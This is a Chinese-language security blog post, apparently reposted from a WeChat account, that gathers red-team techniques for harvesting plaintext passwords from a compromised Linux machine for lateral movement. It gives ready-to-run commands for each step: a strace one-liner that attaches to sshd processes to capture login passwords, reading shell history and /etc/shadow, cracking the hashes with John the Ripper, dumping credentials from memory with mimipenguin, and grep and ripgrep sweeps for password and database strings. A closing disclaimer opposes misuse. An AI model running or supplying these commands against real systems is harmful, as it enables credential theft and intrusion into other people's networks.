Linux明文密码获取

admin 2023年1月30日03:36:04评论116 views字数 1165阅读3分53秒阅读模式

写在前面

    去年一次红队复盘,一个师傅用strace钓到了Linux机器的账密,简单汇总实践一下Linux明文账密获取。


目录

0x01 sshd进程监听0x02 history0x03 shadow0x04 内存中明文密码抓取0x05 全局搜索0x06 参考

Linux明文密码获取



sshd进程监听

适用场景:利用RCE漏洞获取linux机器权限,并没有该机器ssh密码,获取明文密码后可用于内网横向。

利用strace监听所有sshd进程

strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> sshd.log &

当有新的连接,会产生明文记录,read(6, "f10后面为密码

Linux明文密码获取


history

history,不小心输入到命令行的密码

Linux明文密码获取


shadow

root权限下 vim /etc/shadow
$6$lEzUomMQ19rhmRGi$8KLH4irfWaZ$id为1时,采用MD5进行加密$id为5时,采用SHA256进行加密$id为6时,采用SHA512进行加密
都可以扔到CMD5去解密,解密失败可以尝试通过john进行暴力破解(能连外网情况下),取决于密码本,作用有限:
wget https://www.openwall.com/john/k/john-1.9.0.tar.gztar -zxvf john-1.9.0.tar.gzmake clean linux-x86-64
//在run目录下./john /etc/shadow

Linux明文密码获取


内存中明文密码抓取

mimipenguin,仅适用于Kali、Ubnutu
./mimipenguin.sh
Linux明文密码获取


全局搜索

grep -rn "password=" /
Linux明文密码获取

快速全局搜索

apt install ripgreprg -i -e "pass" -e "pwd" -e "passwd" -e "密码" -g "*.{ini,xml,config,properties,sh,yum,cnf,class,dat}" / >pwd.txt//数据库连接信息rg -i -e "1521" -e "1433" -g "*.{ini,xml,config,properties,sh,yum}" / >db.txt
Linux明文密码获取

参考

https://www.linuxprobe.com/linux-commands-tools.html



写在最后

    本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好维护个人信息安全、企业安全、国家安全。

    未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

原文始发于微信公众号(云下信安):Linux明文密码获取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月30日03:36:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Linux明文密码获取https://cn-sec.com/archives/1529333.html

发表评论

匿名网友 填写信息